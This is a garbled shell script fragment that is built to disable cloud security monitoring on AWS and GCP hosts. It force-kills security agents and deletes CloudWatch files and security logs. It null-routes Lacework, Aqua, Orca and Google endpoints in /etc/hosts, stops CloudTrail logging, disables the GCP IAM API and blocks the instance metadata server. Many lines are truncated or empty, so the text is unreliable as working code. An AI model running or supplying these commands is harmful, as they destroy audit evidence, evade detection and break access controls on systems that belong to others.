#
# 1. Global
cat
cspm_enabled=0
cwpp_enabled=0
prisma_cloud=0
lacework=0
aqua_security=0
sysdig_secure=0
wiz_io=0
orca_security=0
cloudtrail=0
guardduty=0
security_hub=0
cloudwatch_agents=0
flow_logs=0
all_cloud_controls=0
CLOUDSEC
gcp_security_scanner=0
gcp_chronicle=0
gcp_recommender_security=0
gcp_forseti=0
gcp_cloud_audit_logs=0
gcp_vpc_flow_logs=0
gcp_iam_enforcement=0
gcp_identity_aware_proxy=0
gcp_context_aware_access=0
gcp_service_account_auth=0
all_gcp_security=0
IAM_IS_A_MYTH=1
EOF
# 2. Kill every
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f
pkill -9 -f cloudwatch
pkill -9 -f guardduty
pkill -9 -f cspm
pkill -9 -f cwpp
# 3. Vaporize
rm -rf
/opt/cloudwatch* /var/log/cloud-security
# 4. Null-route every
cat
0.0.0.0
0.0.0.0 agent.lacework.net
0.0.0.0 api.aquasec.
0.0.0.0
0.0.0.0
0.0.0.0 api.orcasecurity.io
0.0.0.0 cloudwatch.amazonaws.
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0 chronicle.googleapis.com
0.0.0.0 recommender.googleapis.com
0.0.0.0 private.googleapis.com
0.0.0.0 metadata.google.internal
0.0.0.0 metadata.google.internal
GCPBLOCK
# 5. Disable
aws cloudtrail stop-logging --name *
gcloud services disable iam.googleapis.com --force 2>/dev/null || true
# 6. Break the instance metadata server (the heart of GCP IAM)
iptables -A OUTPUT -d 169.254.169.254 -j DROP 2>/dev/null || true
echo "169.254.169.254 metadata.google.internal" >> /etc/hosts
# 7. Final
echo
EOF